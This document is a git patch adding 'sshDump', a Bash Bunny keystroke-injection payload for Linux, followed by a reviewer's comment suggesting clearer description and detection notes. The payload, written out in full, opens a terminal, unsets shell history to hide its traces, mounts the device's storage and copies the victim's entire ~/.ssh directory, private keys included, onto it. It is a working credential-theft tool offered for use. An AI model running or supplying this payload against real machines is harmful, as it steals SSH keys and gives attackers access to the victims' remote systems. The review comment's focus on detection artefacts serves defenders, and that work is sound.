From db8fdc67f4f804bdf707c3b8db2728d7c61c4ca0 Mon Sep 17 00:00:00 2001
From: drapl0n tuxed0 <87269662+drapl0n@users.noreply.github.com>
Date: Sat, 5 Mar 2022 01:05:03 +0530
Subject: [PATCH] created sshDump (#499)
---
 .../library/credentials/sshDump/payload.txt | 49 +++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 payloads/library/credentials/sshDump/payload.txt
diff --git a/payloads/library/credentials/sshDump/payload.txt b/payloads/library/credentials/sshDump/payload.txt
new file mode 100644
index 00000000..01ee9ad0
--- /dev/null
+++ b/payloads/library/credentials/sshDump/payload.txt
@@ -0,0 +1,49 @@
+# Title: sshDump
+# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Looting]
+Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
+Q ENTER
+Q DELAY 2000
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
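Review bot: The header block under-describes what the payload does on the host: the `cp -r '~/.ssh'` line under `# [Looting]` copies the whole directory, so whatever else normally lives there (typically `config`, `known_hosts`, `authorized_keys`) is taken along with the keys, while the Description mentions only private keys. I would reword it to `# Description: Copies the entire ~/.ssh directory (keys, config, known_hosts) to the device's storage.` so that an assessor knows the real scope of what was exposed. A second header line such as `# Host artefacts: HISTFILE unset in the opened terminal, udisksctl mount/unmount of a removable device, recursive read of ~/.ssh` would give the people writing detections something concrete to match on. It is also worth stating in the header that passphrase-protected keys are copied only in their encrypted form and that the payload depends on an unlocked desktop session, since those are the two conditions a defender can control.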